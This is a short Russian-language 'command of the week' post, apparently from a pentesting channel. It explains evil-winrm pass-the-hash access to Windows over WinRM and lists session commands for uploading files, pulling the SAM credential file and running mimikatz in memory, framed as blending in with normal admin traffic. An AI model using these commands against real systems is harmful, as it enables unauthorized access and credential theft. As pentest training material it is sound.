⌨️ Команда недели — 24 июля 2026 г. в 10:12:06.734
⌨️ Команда недели Привет! Есть хэш или пароль, машина слушает на 5985. WinRM это легитимный протокол удалённого управления Windows, и именно поэтому он интересен на пентесте. evil-winrm -i 10.10.10.1 -u Administrator -H <NTLM_hash> Получаешь полноценный интерактивный PowerShell прямо в терминале. Без лишнего шума, трафик выглядит как обычное администрирование. 👨💻 Что здесь происходит -i - IP целевой машины -u - имя пользователя -H - NTLM-хэш напрямую, пароль знать не нужно -p - если есть пароль, используй вместо -H Внутри сессии есть встроенные команды которых нет в обычном PowerShell: upload file.exe - загрузить файл на машину download SAM - забрать файл обратно Invoke-Binary ./mimikatz.exe - запустить бинарник прямо из памяти без записи на диск P.S WinRM включён по умолчанию на Windows Server 2012 и новее, на десктопных версиях надо включать вручную. Если порт 5985 закрыт, проверь 5986 - это WinRM поверх HTTPS. Как обычно работаете с машиной после получения первого доступа? 👇 🤖Бесплатный ChatGPT

